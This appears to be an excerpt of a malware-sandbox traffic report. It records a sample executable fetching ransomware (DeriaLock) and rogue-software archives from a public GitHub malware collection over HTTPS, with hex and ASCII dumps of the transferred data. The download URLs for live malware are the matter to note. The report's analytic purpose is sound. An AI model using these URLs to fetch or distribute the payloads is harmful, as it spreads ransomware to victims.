                                                                                                                                                2022-09-29 12:51:54 UTC32204INData Raw: 09 ff 0d 53 2f fe 48 4b b8 fb b7 e6 e0 ea 80 99 7b b8 84 0c 95 fe 09 ac a0 23 01 46 e2 e0 f6 97 c7 98 1b 79 13 23 95 c0 9f 03 f2 fb 73 c8 78 cd 76 e3 1e f5 96 2e 81 ea a6 ca b3 5a 59 15 38 ce 72 5d 82 6c c4 29 d9 9c 79 f4 8e de 76 bd c2 44 fb 67 1e ec 6d 3e 81 f3 c1 74 6f be 60 08 21 98 db a7 de e0 b0 f8 25 85 27 f8 b9 04 7c 59 86 fc f3 20 74 8d d2 34 ed 69 64 47 89 cc 04 fe eb 7f 42 fb 6a 52 21 f4 8e 73 6b ba 0d 77 04 0e f2 ba 74 92 c6 5e e2 bb be 59 e2 e4 ec 9f 80 f6 ac 06 b0 52 d6 59 49 98 73 a4 65 d2 49 19 d9 69 06 cf 76 f0 19 0d 81 88 73 f5 80 e6 15 f9 ec 79 dc 80 67 fa 2a 31 3c df 9c 29 12 27 aa 13 1e a3 00 fb c9 e8 cd b1 5a e3 41 3b 6f fb 77 c0 b4 e6 5c fb 2b 56 41 bc 81 da 47 eb ef 0d 66 fb 3e f5 86 c2 51 eb 82 25 be 34 9f 8e f2 50 00 df e6 a8 12
                                                                                                                                                Data Ascii: S/HK{#Fy#sxv.ZY8r]l)yvDgm>to`!%'|Y t4idGBjR!skwt^YRYIseIivsyg*1<)'ZA;ow\+VAGf>Q%4P
                                                                                                                                                2022-09-29 12:51:54 UTC32220INData Raw: 5c c8 68 2e 5d ed f2 06 ea 78 e8 55 67 88 f0 db 9e 14 f1 96 ec 9b 6b 60 be 70 80 d7 71 9c da 2e 00 96 6a fa b9 ad 02 4b f8 a0 c7 3c dd c1 12 1f 72 26 d2 81 64 08 f2 a4 8d 54 f1 c5 a9 b5 b5 2a 16 c8 35 0b 60 eb 69 b9 54 ae d4 0b 83 50 81 3b 5a af 2f 3d e8 00 1d df 9a 78 b1 b8 68 6e 60 d6 7f 42 3d df c7 76 ed 04 3d ea f4 53 ac 8f 3b a4 4b bd c8 e6 ee 5a 16 4b 2c c8 14 9e f3 a3 4a 5d 32 73 10 4f 56 46 4d eb f6 cc 38 aa 90 e6 75 64 41 62 a9 04 b9 bc c6 64 75 90 45 b7 7d c9 33 c2 82 7e 7c 58 03 5a 4e 35 73 cf e3 e2 d2 fe 67 ce da fe f6 87 77 0c 87 54 46 82 8a 53 a8 bc 02 09 20 e1 3c 8b 4c 04 2d 06 06 b5 08 4d 01 29 73 3e e3 99 0c 71 d6 ef da ee f4 3d d7 97 b1 df f2 85 67 1e f6 27 d5 1e 29 b6 c1 47 61 09 8d 3d 01 be d8 3b 65 c9 07 83 30 5c 87 36 e2 f3 f5 a8 59
                                                                                                                                                Data Ascii: \h.]xUgk`pq.jK<r&dT*5`iTP;Z/=xhn`B=v=S;KZK,J]2sOVFM8udAbduE}3~|XZN5sgwTFS <L-M)s>q=g')Ga=;e0\6Y
                                                                                                                                                2022-09-29 12:51:54 UTC32236INData Raw: ee 83 b4 be c0 38 5e 82 23 e5 9f 1c 47 e5 40 73 c8 d8 a5 25 2c 6e 13 e6 05 10 49 d3 3c c8 b1 8b 0a ce 08 47 00 2e ab 8a 86 ea f1 b8 2d 51 5f c0 4a 90 45 eb 05 2b 76 d8 81 4f c8 9a 94 ff c3 03 ca 00 26 ec 15 9f 90 dd 7e 58 d3 5e 0f 52 b8 00 5f 56 75 7f 30 6f 7b 32 92 9c 75 87 79 1a 38 76 9a d4 53 ce b3 43 4d e3 57 08 80 13 fc a7 ca 65 bc 8a d3 14 7b c0 c0 7c d7 8b ff 3a c6 0a fc 58 62 21 a7 32 fb 3c 46 4e 26 8a a2 34 fb c5 19 2a ef 3a 88 52 95 cb 8a 2c 6e f0 c3 4c e6 25 3a 7d 08 fa f1 a9 57 3a ba e1 6d 76 f4 09 32 fb 2a c4 02 6c 86 3e 9b 75 a4 8c 4c f5 12 e3 f8 b5 f7 1b 7d 55 7c 84 c2 e0 97 36 a8 eb 40 61 85 12 68 3b ee 69 20 f0 9d eb f0 89 1c b1 92 96 d8 46 b1 c8 32 47 7a d9 1a 6e 52 a8 df 79 50 77 ee 3d 30 a8 f5 50 ba 31 c0 35 51 c2 92 ee c6 f0 bb 3e 25
                                                                                                                                                Data Ascii: 8^#G@s%,nI<G.-Q_JE+vO&~X^R_Vu0o{2uy8vSCMWe{|:Xb!2<FN&4*:R,nL%:}W:mv2*l>uL}U|6@ah;i F2GznRyPw=0P15Q>%
                                                                                                                                                2022-09-29 12:51:54 UTC32252INData Raw: 61 ff 69 06 6a 6a d2 8a fc ee 72 c7 44 d8 b6 9c 45 01 8c 68 45 5b e2 46 a7 38 f4 66 a0 d2 f7 0d ae 2d 9f 79 e8 68 ca 1f bb a3 92 ba fd b9 90 bf 8a 6a ea 70 0e 69 08 bb f9 92 b4 4c c2 0c 89 78 cc 4f 19 bc f8 bd 7a 81 4a 04 56 aa 3a 70 d3 62 0a 3b de 6f 37 7a 1e f3 42 d7 d4 5c 95 c8 07 8f bc 55 18 95 16 85 56 d1 de 04 da 46 37 63 7f ed 96 46 4c fa 6b dd 87 a3 80 06 60 73 71 da ff 26 34 9b e5 9d bd bd eb 5b 7a 8f 20 98 8b 97 78 21 aa b4 cc ff d6 50 ce ed 8e 2b cb eb 35 77 3f a7 10 04 45 32 c7 75 f0 e0 06 75 0b 79 04 7c e8 86 98 0e b1 b3 ac 70 44 3e 9f 55 68 8c 31 41 4a 97 65 0c 26 5b 98 bc 34 6d 01 06 9e 9b 2a 11 2c b3 b6 e4 cc 38 b5 c2 8b 08 53 44 c8 cf 19 cb 99 a5 c9 6e fb 53 8d bb fc 86 44 a8 54 1a d8 60 6d 2f 6c 4b c9 09 70 0a c8 74 ce d1 ee d8 50 6c 31
                                                                                                                                                Data Ascii: aijjrDEhE[F8f-yhjpiLxOzJV:pb;o7zB\UVF7cFLk`sq&4[z x!P+5w?E2uuy|pD>Uh1AJe&[4m*,8SDnSDT`m/lKptPl1
                                                                                                                                                2022-09-29 12:51:54 UTC32268INData Raw: 46 c7 17 ab 57 05 cd f3 e7 f8 5e 6f 6d a6 90 23 2f 34 aa e3 ba d6 21 f7 94 c9 6d 1a 6a 1f 03 65 c1 58 b4 28 19 17 a4 e9 fa 3b a0 c2 d2 11 58 32 48 c4 6d 84 6f 40 ae be 7a d1 d3 bb 01 7a 58 79 66 6e 93 37 b2 8b c5 17 e3 f0 5e dd e6 7f 9e f3 e3 27 12 a8 71 11 08 c8 39 96 0e bf 38 1a 00 9b a0 8d 20 f4 0a 28 8c 37 20 f0 55 ad 93 4f 39 c9 2b c9 6c 44 82 ab 33 b9 a9 71 4c 59 56 c8 fa fb 61 17 87 70 56 d9 2f c3 c3 3c bc 03 e3 5e 51 1b b1 5e fb 66 8f e2 25 8d 62 1a c9 89 58 61 00 76 fb 45 46 ef cd 01 04 a2 1d 52 e1 aa f5 ae f9 95 fc 80 c3 c7 c9 24 98 8c 6a 82 c5 3d be ce 2a c1 20 b8 4f 97 e5 14 3c bf c0 e2 6e 4c 4d b6 f4 93 8a e9 16 99 ed ed c4 11 44 c9 f9 ed dd 21 8b 6b 0c 18 f8 f0 4f 87 46 79 df 21 3e 7e 5d 76 4e 0e be b4 e9 46 0f 82 63 07 ae 0f 91 82 72 c4 e4
                                                                                                                                                Data Ascii: FW^om#/4!mjeX(;X2Hmo@zzXyfn7^'q98 (7 UO9+lD3qLYVapV/<^Q^f%bXavEFR$j=* O<nLMD!kOFy!>~]vNFcr
                                                                                                                                                2022-09-29 12:51:54 UTC32284INData Raw: 78 2a d4 94 62 6f c4 c0 de 64 02 96 d5 cd 6a bd 9d db f2 24 7c 18 c4 da dd 61 4e 7b 8c 21 42 4e 3b ed f1 e8 81 c2 31 e6 92 0d 00 ac 6b ff 4c e1 48 52 24 f2 f2 52 c2 91 3f d1 20 69 84 ee 34 12 3a 47 47 ea eb 1d 93 98 c3 bf ba c1 93 e6 db 4e a2 2b d4 40 d9 3e bf ff 9d 52 f5 60 7d c7 c1 34 85 98 96 ab 9c f1 4e 82 7f 73 91 09 07 f2 34 93 c4 53 81 f2 e0 0b 24 5c 0a 87 b0 19 00 bb a4 27 c6 7b 20 4b 28 8d ef ed f2 36 82 ef 9d 18 e2 a4 c9 a7 00 8a 19 95 93 1a a7 91 43 37 3e 44 24 ef 81 bb 2b 2f 8c d0 b5 a0 8f a8 3f 8e 3a c2 87 14 0c 7f 4c 80 c9 53 20 a5 5e ec 52 08 b2 aa 0b 50 06 c8 fe d0 82 79 e7 2d 6c 05 8f da cb 01 e8 93 17 7a d6 c1 c7 14 77 38 da 9f 3a 6d 25 d1 fa 54 03 87 44 17 51 90 62 2a 21 cb a4 d2 3a fe 42 9a 71 cb 23 4d 34 17 43 aa d7 ba 5e 31 a0 d6 6d
                                                                                                                                                Data Ascii: x*bodj$|aN{!BN;1kLHR$R? i4:GGN+@>R`}4Ns4S$\'{ K(6C7>D$+/?:LS ^RPy-lzw8:m%TDQb*!:Bq#M4C^1m
                                                                                                                                                2022-09-29 12:51:54 UTC32300INData Raw: dd b2 e9 74 f7 20 6d de 6c 3b dd 85 0c 7b e7 48 f4 77 cc ca 04 ef 0b 65 bb b5 72 11 17 4e 2a f6 e3 8c 8f 7b 24 db 67 a1 ff fc 65 b5 d4 9b 0d 59 c4 4b aa 96 a0 a5 13 fa 80 4e f4 bb be 60 df 83 49 01 23 25 45 2c 54 3f 61 83 01 95 f8 ca fe c3 9f 9e ca ee bb 8a 1f 84 6d 01 f7 e9 cd a0 50 8d ef 33 77 29 b9 f7 55 25 e2 56 28 62 65 be a6 a5 92 52 ce 7c 5e e2 08 87 20 5d 68 1d e4 08 bc f2 e9 47 48 8c 9f 98 98 9b 0a 2a e9 b7 66 f2 4d 18 ea df cf b7 f8 f6 ca b3 57 ff f3 85 38 41 19 82 2a 99 66 9d af 0f 84 fa 7a e6 e5 a0 47 4b 70 dd 35 3f ff 92 14 f2 31 17 6c 38 c1 cc 05 78 55 f2 99 e4 25 81 97 5b f9 c8 34 9c c5 e5 23 0e fe 6b 22 04 99 f1 0f e6 14 92 a8 84 6a 27 d1 04 69 09 f2 ba 1d 0c 17 36 eb ff 77 c2 f0 91 8d aa 6f 6c 12 d6 65 58 31 64 7e f4 2a 90 6a 63 bd 36 fb
                                                                                                                                                Data Ascii: t ml;{HwerN*{$geYKN`I#%E,T?amP3w)U%V(beR|^ ]hGH*fMW8A*fzGKp5?1l8xU%[4#k"j'i6woleX1d~*jc6
                                                                                                                                                2022-09-29 12:51:54 UTC32309INData Raw: 2b e8 e9 eb 37 34 48 bb ca 3b c7 9c 66 86 00 92 fd 2c 83 e5 bc 95 39 fd e4 28 f4 aa 39 cc ab 74 d5 56 be cb 5c bb 2f 0e ee 56 6c d0 e8 8f 6c 55 44 81 b9 8b 93 c8 e3 e9 19 61 9e 38 59 6b aa 54 0b 06 1e d4 e5 c9 cd 74 ad a5 68 30 ca 94 53 f2 ed 22 d3 98 32 a5 5f b2 c8 f6 74 28 e0 3d a4 25 db b4 58 d9 8b 57 ff 09 5b 6c 35 81 dc 68 ab 64 3b 14 d2 e9 42 a7 b6 a3 98 25 1a e5 a0 0a 07 9d 50 67 71 1c d3 9a 06 47 9b 4f af 4b 2b c6 92 df da cc 05 45 50 af 16 77 70 b1 88 ea 59 56 57 8e eb 4e e2 b1 50 7e 50 df f9 62 cd 1c ea 45 17 ca 84 82 fa 3f d7 d6 91 70 8f b3 50 67 c2 8b bb 0d 72 6e b1 85 06 1e d6 77 22 c9 36 79 39 26 eb 33 2e 32 64 23 59 a2 1d 27 7a a3 78 44 a4 b1 30 68 3a 13 cc 54 e3 4f 5d 48 4e e3 0b ab c8 3f 90 22 1e 9f 34 8a 7f ae b4 b4 93 58 7a b7 5d eb fe
                                                                                                                                                Data Ascii: +74H;f,9(9tV\/VllUDa8YkTth0S"2_t(=%XW[l5hd;B%PgqGOK+EPwpYVWNP~PbE?pPgrnw"6y9&3.2d#Y'zxD0h:TO]HN?"4Xz]
                                                                                                                                                2022-09-29 12:51:54 UTC32325INData Raw: 1a b0 00 5b 18 a7 45 7d 90 4f 7b 9b 59 12 be 2a d2 7d a3 f0 74 1c e3 18 08 66 f9 05 11 6e fb 59 3b be 30 ba 9a 58 d1 cc 87 e5 89 9f ae a6 09 43 7c 0b 43 2c c8 45 76 31 12 3e bf 64 2e 59 45 78 dd a4 36 42 26 bc 24 1b ee 9a bf 3e 48 55 69 c3 4b 5f ac f5 38 51 84 1b aa 8b 17 19 5a 0e bd d8 03 8f e5 81 af 0d cd bf c6 48 d4 d6 b2 9d 50 7e 2e a6 43 0f 8b 17 7d fd 05 99 de 41 f8 da 6d 3c fc c7 7f 6c 5c 96 ed b9 1b 4a a7 07 40 80 5e 68 67 2e 0f 18 35 b8 fe 17 40 3a c0 66 31 11 71 12 1d 50 af 7a 75 bc 34 37 47 93 9b df 40 25 65 0c c2 5f fb de 8b 7a dd b8 e1 f6 0d 67 31 98 77 1b 51 ce c4 61 b4 c8 9d dc e2 f7 35 27 a3 6f c1 6a be 4b a5 5c be 0f 7c 49 12 0c 3a cc fe 26 0d 1d 85 b5 1a 5a 45 29 a7 31 cb 66 c2 ce ce ec 86 8f 64 d5 11 30 e1 3c 27 5e 04 b3 24 60 10 92 12
                                                                                                                                                Data Ascii: [E}O{Y*}tfnY;0XC|C,Ev1>d.YEx6B&$>HUiK_8QZHP~.C}Am<l\J@^hg.5@:f1qPzu47G@%e_zg1wQa5'ojK\|I:&ZE)1fd0<'^$`
                                                                                                                                                2022-09-29 12:51:54 UTC32341INData Raw: 4f 28 42 7d 94 26 bd d2 13 78 ad 4e ed 9c 2e 11 ee df 7c 66 1a 2d 2d 25 3d 6f e8 0a 30 ba f1 43 36 fa b6 4d 47 95 a0 1a 92 90 1b 54 7b b4 55 91 88 1c 78 2c 13 eb 88 4d 5b 4b c9 54 e7 88 d6 8c 0d 56 60 86 d0 d3 3b 69 24 64 6a 8a 3f 03 e4 d6 fd bc 90 be ee b8 46 d8 bd bf e7 1b 81 74 e8 89 4c 0f 2a 66 aa 7d 4c 0d e8 da be d3 64 44 2a e2 a6 a4 f4 c1 32 3a 22 52 e6 5b 34 7a fc 2f f6 29 a8 40 4a 4d f0 f1 82 4b 2a 83 5f 9d f3 31 51 53 a0 ca 3d 78 6c b4 8f 15 a8 ba c5 76 05 a8 e1 ff ad 4e 80 88 2b ba f3 a1 8e 92 c7 0e d5 37 b4 20 96 41 fd c6 a7 42 f4 90 6a b3 9c a8 8b 36 17 be 64 da 7c fc 66 22 6c 2b 29 eb c9 2b 84 93 1c e9 d2 86 de 5f e5 3c 14 45 92 62 74 8d fb 28 9b 7b ca 55 a4 a7 2d fb c5 73 39 83 51 4c 0f b4 70 0d 4a 54 55 19 6f 53 3a 80 84 c4 41 9f f9 de 9b
                                                                                                                                                Data Ascii: O(B}&xN.|f--%=o0C6MGT{Ux,M[KTV`;i$dj?FtL*f}LdD*2:"R[4z/)@JMK*_1QS=xlvN+7 ABj6d|f"l+)+_<Ebt({U-s9QLpJTUoS:A
                                                                                                                                                2022-09-29 12:51:54 UTC32357INData Raw: b0 42 26 91 39 f0 f9 38 df 3a 42 2a 3a 2c c0 b5 0b 5c 1d fb aa 4a 25 64 b8 14 df 4e 5c 72 58 ff 3e a9 51 92 f1 b5 82 0d cc c4 33 b8 0a 78 fd 5f 61 02 41 d2 76 cb 7d a6 ed 48 18 88 bd ad 24 80 7f 60 6d 53 01 f7 74 0f bb c0 a2 e1 4f 65 ab 7d ac ec 18 0e d5 9a 44 35 fb 95 c5 5f a8 e9 f8 00 7f 05 e7 3a 56 58 bd 6d 36 a6 a6 76 91 2d 2a e4 66 f3 63 f6 1e 8d 5f b9 1e 88 27 79 93 06 52 b5 0a c7 e5 c5 14 eb 68 24 c5 99 f7 e8 40 e8 89 01 8c 09 a6 1f a3 22 ad b2 ac 86 09 15 6b 58 25 6a cd 5c 69 98 51 b5 ed d9 39 b1 87 c8 1c 8e e8 c3 32 e0 25 76 bc 2d 04 15 c1 67 ed 73 20 09 e5 1b 24 30 0c 66 49 de 1f a5 57 e0 2a 22 03 5f 8e 5d 13 b1 39 08 79 c0 b4 7d d0 6e cc ab 6d 16 44 14 59 2d 5c 2e 32 11 79 28 41 cc e9 65 9e 72 80 45 f3 8b 34 13 39 bc d5 f2 b1 f4 c5 a0 82 2c 02
                                                                                                                                                Data Ascii: B&98:B*:,\J%dN\rX>Q3x_aAv}H$`mStOe}D5_:VXm6v-*fc_'yRh$@"kX%j\iQ92%v-gs $0fIW*"_]9y}nmDY-\.2y(AerE49,
                                                                                                                                                2022-09-29 12:51:54 UTC32373INData Raw: dd be 52 d3 6e 08 d4 ed 73 66 d2 51 fa 89 32 df d9 37 14 66 dc ac ad 19 84 02 98 42 d5 e3 3f 39 b5 df 3d f7 90 94 46 fc c7 02 df 26 65 3d 41 24 27 84 87 39 8c 83 b7 cf 20 76 dc e5 14 b8 e5 96 5f 0e 6c fe 1d f3 62 e2 7c eb 2c 1f 91 59 08 c0 ee 65 a9 7f 59 2d fb df 0f 52 5d 2f a8 95 00 ed 01 d6 75 11 6c 0e b1 5a 66 b6 84 98 7a ea 18 87 51 8a 4c da 61 e4 1a 22 75 08 71 f0 68 09 2e 90 26 4c 46 bc 0a fc 6a 04 94 52 18 e2 da ce 8c c1 d0 38 7e b4 16 1a 40 e2 8a ec 27 02 39 33 1f a3 67 1f ea 43 6f 95 b1 ec 34 bc b7 f0 a2 c0 d3 94 bd 65 74 d8 c6 64 12 31 f9 c4 39 9c 21 e0 2e d4 ce 7b ad 7e 4a 65 8c a1 2f 7a 58 cd bc f7 64 ed ce e8 4f f5 43 dd 3a a6 25 59 d6 48 4e 08 2c a4 5e 57 76 dc eb 7d 6e 8b d5 87 a4 58 0c 6d 9b ec 06 d4 4a 53 e9 7f db d4 77 14 35 85 67 6c b2
                                                                                                                                                Data Ascii: RnsfQ27fB?9=F&e=A$'9 v_lb|,YeY-R]/ulZfzQLa"uqh.&LFjR8~@'93gCo4etd19!.{~Je/zXdOC:%YHN,^Wv}nXmJSw5gl


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                6192.168.2.549706140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:17 UTC698OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:17 UTC698INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:17 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:17 UTC698INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                60192.168.2.549761140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:55 UTC32376OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:55 UTC32376INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:55 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SE2011.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:55 UTC32377INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                61192.168.2.549762185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:55 UTC32379OUTGET /Endermanch/MalwareDatabase/master/rogues/SE2011.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:55 UTC32379INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 2265879
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "68ce3eb817247cbdbb38d4d0c5fd8556ae42a26c8fa1d29d892506084cacec7d"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0809:045E:1D0478:1EA7B3:63359364
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:55 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6950-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455916.678891,VS0,VE167
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: f4dfb011ebd8efad46e1c49e344f7233d1407f5b
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:55 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:55 UTC32380INData Raw: 50 4b 03 04 33 00 01 00 63 00 66 ab 98 43 00 00 00 00 51 92 22 00 00 76 26 00 15 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 45 32 30 31 31 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 2f 34 9b fa 53 72 7f f2 f8 28 ea ed e3 98 44 e9 3e 6e 80 5c d8 f8 81 cc 55 93 6d 4a ed 13 7c 3f c6 ea ed 1d 23 c4 cc c5 59 61 c9 93 9b 12 c2 35 1a 29 ef 86 ea a8 23 3c 8f 24 e8 49 51 59 0d a0 55 6e 83 ee 2a f4 20 43 2e 76 ca 10 21 46 9e 5e c0 8f 4b fb a0 b4 56 79 2a ee 69 3f 22 60 14 f9 e3 80 b0 b4 96 3e 89 c0 8d 99 55 cc db e8 98 23 fc 62 f3 5a e5 9e 76 1e 7f b1 b0 a6 25 c9 a1 98 36 fc 01 9c 82 e9 9c 37 a6 e6 26 99 9f 26 8c 4a e9 be 31 b5 3e 6c b3 31 e7 73 5d da 4b ac 18 9d cf 11 8f cc 7e f2 a0 39 84 32 8d 4c 15 e9 9c d7 e1 a7 4e a5 ed 94 5f 06 5f 11 5e ad 80 08 33 09 bf
                                                                                                                                                Data Ascii: PK3cfCQ"v&Endermanch@SE2011.exeAE/4Sr(D>n\UmJ|?#Ya5)#<$IQYUn* C.v!F^KVy*i?"`>U#bZv%67&&J1>l1s]K~92LN__^3
                                                                                                                                                2022-09-29 12:51:55 UTC32381INData Raw: be c0 d1 8a 4e 56 db be f1 10 4b 46 1c eb c5 55 b0 91 0e 2e 2c 95 84 f8 cf 4c f5 a7 a8 b2 5e cb 7b ad 79 bf 63 9b d3 a7 49 7f e1 26 ff 05 a5 8d 77 22 fc b5 e2 1d 6c 4f 2b dd 60 27 d4 1c c1 8d bf e4 b9 96 67 c9 7f 8d e7 6e 55 e4 14 d5 f3 0d 84 0b 39 c5 e1 64 10 e8 14 f1 ab de a7 b9 4f 8e 8f 84 53 43 4f e3 cf 67 84 84 36 3b 65 78 65 1e 32 5a de d8 4d f2 f6 07 86 7d 8f 0e 82 1a 61 32 85 b1 b4 d5 23 0c 47 00 72 99 65 5d 7a 5f 8f 6a d1 54 e4 53 ab 2a 21 ef c3 58 fc 69 0c 29 3c a2 11 63 0c 69 05 c1 10 b9 6d 13 4d 00 ae 6b 26 bb f1 f8 47 d5 d5 cc 1f e4 84 ca 7e 9a 7b fc d5 3b e0 17 50 ce 6a ee f3 78 91 f0 73 1d e2 af 73 3a 07 fe 71 6e 40 93 56 b4 76 05 42 b2 ac 7f 85 c2 ea c9 24 2a 92 0a 22 de cc 8c f8 2d 48 85 3a dc d9 7a 68 86 00 df 18 0b d2 00 a2 c8 28 2d 30
                                                                                                                                                Data Ascii: NVKFU.,L^{ycI&w"lO+`'gnU9dOSCOg6;exe2ZM}a2#Gre]z_jTS*!Xi)<cimMk&G~{;Pjxss:qn@VvB$*"-H:zh(-0
